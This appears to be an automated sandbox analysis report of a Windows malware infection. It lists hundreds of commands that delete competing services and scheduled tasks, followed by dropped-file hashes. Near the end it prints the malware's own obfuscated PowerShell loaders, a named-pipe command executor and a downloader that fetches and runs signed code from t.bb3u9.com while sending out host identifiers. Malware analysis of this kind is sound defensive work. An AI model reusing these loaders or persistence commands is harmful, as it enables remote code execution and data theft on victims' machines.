C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete sysmgt5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config \gm Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config National Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Samserver5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Samserver5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SxS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfy Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfya Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfyxxx Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config 360rTys Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config IPSECS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config MpeSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SRDSL Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WifiService Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ALGM Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApSrvs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApServs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config taskmgr1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WebServers Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WebServers5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WebServers5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ExpressVNService Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ExpressVNService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ExpressVNService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WWW.DDOS.CN.COM Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WWW.DDOS.CN.COM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WWW.DDOS.CN.COM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelpSvcs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelpSvcs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelpSvcs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config aspnet_staters Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop aspnet_staters5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete aspnet_staters5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config clr_optimization Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop clr_optimization5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete clr_optimization5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config AxInstSV Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop AxInstSV5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete AxInstSV5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Zational Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Zational5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Zational5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "DNS Server" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "DNS Server"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "DNS Server"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Serhiez Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Serhiez5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Serhiez5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SuperProServer Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SuperProServer5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SuperProServer5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ".Net CLR" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ".Net CLR"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ".Net CLR"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WissssssnHelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WissssssnHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WissssssnHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHasdadelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHasdadelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHasdadelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHasdelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHasdelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHasdelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ClipBooks Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ClipBooks5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ClipBooks5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN my1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ok /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java Update" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Microsoft Telemetry" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Spooler SubSystem Service" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Products Reporter" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for products" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN gm /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ngm /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Sorry /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Windows_Update /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update_windows /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN AdobeFlashPlayer /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN IIS /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsLogTasks /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "System Log Security Check" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update4 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DNS /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEM /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DNS2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEMa /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN skycmd /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Miscfost /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Netframework /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Flash /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN RavTask /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN GooglePingConfigs /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN HomeGroupProvider /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN MiscfostNsi /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WwANsvc /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Bluetooths /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Ddrivers /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsScan /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WebServers /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Credentials /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN TablteInputout /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN werclpsyport /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN HispDemorn /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN LimeRAT-Admin /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for Windows Service" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ECDnsCore /F5⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -anop TCP5⤵
- Gathers network information
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \hP9ntK /F /tr "powershell -c PS_CMD"3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \hP9ntK3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\2bcwf5oo\2bcwf5oo.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESFC0B.tmp" "c:\Windows\Temp\2bcwf5oo\CSC8E6015E52134C9E800F67490EACAF0.TMP"4⤵
-
\??\c:\windows\system32\cmd.exe/c powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
4d1a85f833e259570d88b53c1de297b9
SHA1e8347c3a2202989a6c7a55d721033165e6cfeb37
SHA256f188246e2ecea0bc8f9abdba17a2d46b62324ef8132d33a4bc6ed6a5ef0b438f
SHA512c9ed63db804b482d1a8e9f47c21b6ab697c749a822175b33e24475177978192e2de9cdb50e7c8c8e95b6c9663cf7666c95d66908259240338b5e9760594f1583
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
e48d09c785d76d8eab1fea4cec164a98
SHA16c90b089b909685e3d1068d74a27f6f1f6bd60d8
SHA2561bb9b019136a96f38872b5fd0cdc252461184b0fbe532e67e19b004e7709f7d2
SHA512729ffe5dc67462034e5eabb03bc51a1053005681790bd44fc7b28d3bcb153e60e05dd0f84726dd8e80ba729d587d7b07f66396ef8b587c248696d10e44088775
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
